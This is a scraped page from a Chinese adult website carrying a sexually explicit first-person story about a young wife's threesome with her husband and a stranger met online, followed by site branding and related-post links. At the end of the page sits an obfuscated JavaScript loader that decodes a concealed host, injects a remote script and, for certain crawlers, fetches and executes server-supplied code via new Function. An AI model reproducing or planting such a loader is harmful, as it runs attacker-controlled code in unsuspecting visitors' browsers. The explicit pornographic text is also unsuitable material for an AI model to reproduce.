返回

琪琪无法入眠我们女人也是人!我们更需要心境的解放!6e9

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

袒露少妇的心声:夜深了!琪琪无法入眠

我们女人也是人!我们更需要心境的解放!

我是一个贪玩的小少妇,为什么说是小少妇呢?我出生于一九八三年,今年正好是25岁,现在很多25岁的女子大都还保持着单身女贵族的生活,我的许多女同学都还没有结婚,老实说做为八零后的一代,像我结婚这么早的,尤其是在北京上海等大都市里的女孩子并不太多。所以,本姑娘自称"小少妇"大家可以理解吧,不算是过分的自褒吧,哈哈!

我认识我老公是在我21岁时,那时去他们单位实习,他应该算是我的工作方面的师兄吧。

刚见面时并无多大印象,他不属于靓仔系列里的。那时的我还沉浸在喜欢韩国影星"润"的类型的男孩。但接触久啦,尤其男人往往在工作中的状态是最吸引人的,他的机智他的敏锐他的果敢都深深的吸引了我……开始注意他之后,才越发感觉其实他很帅。MD!当时他身边有个女人,是一个很漂亮的很会撒娇但也很霸道的娘们儿(可能是女人的强烈嫉妒心,所以我如此称呼她,请大家理解!)后来趁他们发生危机的时机,本姑娘不失时机的抓住机会,结果一举获胜!俘获了老公之后,发现男人必须要调理,不是管理,是调理!管理会让他很反感,时间长了必然适得其反。而调理,是一种调剂中梳理,梳理中整理,整理中慢慢的打理……慢慢的他就归顺于你的管理啦!哈哈……不知不觉中他就会丧失自我完全依赖依顺和依从啦!(我是不是很阴呀!阴险的小少妇)

我们很快就结婚了,(MD,快刀斩乱麻!不然别搞的鸡飞蛋打!)结婚不久,天天朝夕相处的彼此很快熟悉的滚瓜烂熟。加上大家又忙乎各自的工作,所以居然好长时间两个人没在一起亲热了,即使偶尔做爱也是行色匆匆的,经常是连嘴都不亲我。记得,刚刚彼此有染时,我们在办公室楼道拐弯处的每一次偷偷的热吻,是那样的迷醉那样的深情那样的荡心回肠,每次接吻我都会浑身发抖,他的大手在我的裙子底下不停的乱动着,让人春心激荡潺潺流水……MD!还不过一年而已,这家伙居然再也不碰我的玉唇啦!有些懊恼!后来,我的一个很开放的大学女同学来北京,她很风骚,说话时的劲儿矫柔百态的,老公被她勾了魂了。和女同学吃完晚饭散伙后,回家的路上老公显的格外兴奋,开车时,不时的找机会亲吻我,好久没有了的温情仿佛又回来啦!回到家后,连灯都没开,进了门两个人就连滚带爬的拥在了一起,在地板上就疯狂的干了起来……那次玩的真的很疯狂,是我们结婚以来从来没有过的感受……在和老公做爱过程中,我问起老公想不想和我的女同学干?老公说想,我说那你就想象着在干她吧!结果,老公无比的兴奋!其实,两个人都会感觉很好,因为彼此的情绪感染会让做爱更加颠狂和刺激,会让两个人的爱骤然升华!那时,我才有点明白啦,其实,爱是需要调剂的,做爱也是一种游戏,相爱的两个人的游戏!而为了游戏的质量是可以超越所谓情感的。所以,人类这鸟高级动物竟然发明了"交换游戏"!这游戏的确叫人值得玩味……的确是一种高级的趣味游戏呀!

后来,我发现了夫妻网站,我介绍给老公看时,他也十分有兴趣!终于,我一天天的把他拉下了水,自从我们的生活有了丰富多彩的游戏,老公和我的爱情生活愈加美妙,我们更加相知相爱啦!老实说,我的父母都是大学里的教授,我从小到大接受的还是三从四德的理念,所以我们的内心应该说是很矛盾的。但我们发现了其中的奥妙,我们领悟了其中的快乐!人生苦短,我们为什么不好好的为自己的快乐活一场呢?

前言罗唆了这么多,无非为自己的放荡找点逻辑和解释!我受过良好的大学教育,出生于高级知识分子家庭,生于国家强盛的八零时代,有个憨厚诚挚的好老公,有个自己热爱的伟大事业……可就是非常的贪玩!越是超乎寻常的刺激的游戏越想尝试!也许我真的很骚,很贱,很淫!可是,我那贱老公却更加的喜欢和抓狂!你喜欢吗?下面就听一段我和老公初次和一个单男的游戏故事吧:
那是在网上初次看到别人家的3P图片,我和老公看的是面红耳赤心惊肉跳的。做爱时我们初次想象了我和另外一个陌生男人的状态,老公也很兴奋。我就更不用说啦……后来,老公说你就好好在网上寻找一个心仪的吧。我们寻找了很久。一直到"小城故事"的人的出现,他自称是来自于大连,大学毕业后留在了北京,也是刚刚结婚不久。他讲了曾经与妻子谈起"交换游戏",但让媳妇给臭骂了一顿!感觉他很实在和可爱,后来多次的书信往来,慢慢的有了接受的心理准备。他很坦诚的告诉我们,他曾经有过一次3P的经历,而且是个很担惊受怕的开始,因为游戏的双方都很谨慎,都怕是个骗局,所以整个过程进行的不是很完美。听他讲的应该很真实和可信,通信中发现了他的品质应该是值得信任的。
我们不是QQ聊的,我一直不喜欢在网上与陌生人QQ聊,我们一直是靠EMAIL来书信交流。终于,我们决定要跨出质的飞跃!那天,是一早,我上网先是给他发了个很短的信:我说,如果今晚你有时间并愿意的话可以来我家!
他到了中午才给我回的信,信中说:他非常愿意,只是不知如果真面对我们夫妻,我老公到底能不能受的了,他不希望发生不愉快的事情!其实,到了下午我也有些犹豫了,我也有点怕,倒不是老公能否接受,而是我担心自己是否真的能放的开!

他一连发了三封信,开始我都没回。后来,老公鼓励我,说:感觉好就进行,感觉没有就喝杯茶聊聊天吗!反正谁也不认识谁!

我们约他晚上八点吃过饭来我家,告诉了他我们小区的地址,他也在中关村住,而我们住在北京大学附近,所以也比较方便。我还特意强调的告诉他:晚饭不许吃大葱大蒜之类的东西,还有,来之前要洗澡,要干干净净的出现在我的面前!(我是个有洁僻的很事妈儿的女人吧!)让他先前洗过澡,是我们不想到我家再洗而影响了特殊的气氛!

八点整,他如约到了我们的小区大门口,老公出去接的他。老公出去时看到在大门处一个高个子的小伙儿,带着副眼镜,还很斯文。因为当时是冬天,也不知是天气的寒冷还是他内心的恐慌,老公说看见他在风里哆唆着……老公领他回到家里进门时,我坐在沙发上看着电视,也没看他,其实当时我的心里也是砰砰的乱跳,毕竟过一会儿也许会和一个陌生的男人那样的亲近……心里忐忑不安…


他局促的站在大门处,老公说换一下鞋进来吧!他脱掉鞋,眼睛一直直勾勾的瞄着我,我家当时很热,为了游戏,我穿的是一件黑色的丝薄纱睡裙,半长的,像孕妇装的那种肥大大的款式,下面腿上套着中空的黑丝袜,穿着一条普通的灰色纯棉内裤(因为内裤游戏中马上要脱掉的,所以并没刻意的找上一件性感的穿)。
我侧过头看他一眼,他好像很惊讶,我问怎么啦?他说:以前都是在网上看图片,今天见到真实的人,而且活生生的,感觉像是做梦!我说你的嘴好甜呀!
老公说屋里热快把外衣脱了吧,他脱去外衣后怯生生的坐到沙发边,老公递给他一只香烟,他说不会抽。老公给我点上了一根儿。我吐出烟圈时又侧过头看了他一眼,他还傻楞楞的盯着我看……我们三个人顿了一下,随即大家情不自禁的大笑起来!

老公拿出了早已准备好的红酒给大家倒上,关上了电视(看电视会分神而且气氛也不对!),我们将客厅里的大灯也关上了,点上了几根大蜡烛……音响里轻轻的播放着[恩雅]的唱曲……此时的气氛柔和了许多,也迷漫了暧昧的味道……

我斜躺在他俩对面的一个小双人沙发里,伸着两只套着黑丝袜的大腿晃动着,脚上的特意为游戏穿的尖尖的黑色高跟船鞋在随着乐曲划动着,他看的眼神很迷乱……我站起来,摇摆着走进了卧室……两个男人都默默无语盯着我一直走到卧室的里面……

老公进到卧室问游戏可否进行?我说你愿意就行!将来不许后悔!也不许拿此说事!

老公一脸淫笑的跑出去了,好像不是别人睡他的老婆而是他睡别人的老婆似的!MD!

过了一会儿,老公一个人先进来了,他说跟"小城故事"都讲好了该怎么办,
我说怎么办?老公说:一块儿办!说完他就将我紧紧的拥在了他的怀里,滚烫的嘴巴一下子就包含住了我的小嘴,湿漉漉的舌头在我的嘴里翻滚着……老公把我的内裤脱了去,他让我的头枕在他的大腿上,将被子盖在了我的身体上。老公附下身体低着头,我们就这样热吻着……老公的手揉撮着我的双乳……我的心开始驿动……屁股扭动着,呼吸开始加快……

忽然,感觉底下有一双手掰开了我的双腿,我的心一颤!是他,"小城故事"将头钻进了被窝里,他已经脱的精光,疯狂的舔着我的脚……小腿……大腿…
…到了股骨沟处……我浑身的颤抖着,酥软的躺在老公的怀里,使劲的用自己的舌头勾着老公的舌头……睁眼一瞬间,看见老公也使劲的盯着自己看,可能是自己发骚的样子让他很惊讶。我又赶紧闭上眼睛,两只胳膊死死的搂住老公,可能是掩饰自己抑制不住的骚动……

"小城故事"已经将舌头舔到了我的阴部,他长长的舌头在我的阴唇间跳跃着,我无法控制的呻吟着……快速的扭动着屁股……两只大腿紧紧的夹着"小城故事"的脑袋……

快乐的已经让人受不了啦,我一把将被子掀开,看见"小城故事"满头满脸也不知是被子里捂出的汗水,还是舔的沾满了我的阴水爱液……湿漉漉的脸看上去很是性感!老公把我反按过去,"小城故事"蹲跪在我的脸前,老公在我的身后,按着我的屁股,一下子将他的早已硬挺的大家伙塞进了我的阴部……啊!好舒服!我愉悦的将"小城故事"的白净净家伙含在了嘴里……使劲的吸嘬着……
我跪趴着含着"小城故事"的JJ,老公在我的后面抽插着……房间里只有含啯JJ的吸嘬声和老公的大JJ碰击我阴部的水呱呱的声音……

请大家告诉我……这就是3P吗?真的令人神魂颠倒的时刻呀!一个女人,真的是底下抽插着一个,上边含啯着一个太幸福太兴奋太刺激太满足啦!!!同时能被两个男人疯狂着爱弄着的确是任何一个女人都想要的,更何况我呢,一个贪玩无比的小荡妇!我毫无顾及的大声叫着,愉悦的享受着身体的每一个部位…


(未完待续)

后记:回到卧室看傻老公早已酣睡,自己写的时候已经难以按捺……纯面小内裤早已湿了一大片……决定关机后把老公弄醒,黎明前的疯狂要开始啦……
[本帖最后由akaisuisei于编辑]

评分
相关推荐
3.0分

3.0分 人妻小琪和我的兄弟们bf5

3.0分

3.0分 小琪和我的兄弟们f3e

3.0分

3.0分 小琪和我的兄弟们-淫妻奸情cf8

3.0分

3.0分 琪琪轶事54d

3.0分

3.0分 死党的淫荡女友琪琪fa2

3.0分

3.0分 死党的淫荡女友琪琪fa2

3.0分

3.0分 我们并没做爱,都是别人挤我们的45a

3.0分

3.0分 我们并没做爱,都是别人挤我们的45a

3.0分

3.0分 我经历的女人们(1-10完)作者:流星无心937

3.0分

3.0分 我和我的男人们cde

3.0分

3.0分 在女人双峰以上还有着5个我们更要呵护的位置128

3.0分

3.0分 如梦的梦琪e75

3.0分

3.0分 如梦的梦琪e75

3.0分

3.0分 我诸多的女人们e76

3.0分

3.0分 我诸多的女人们e76

3.0分

3.0分 我经历的女人们353


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};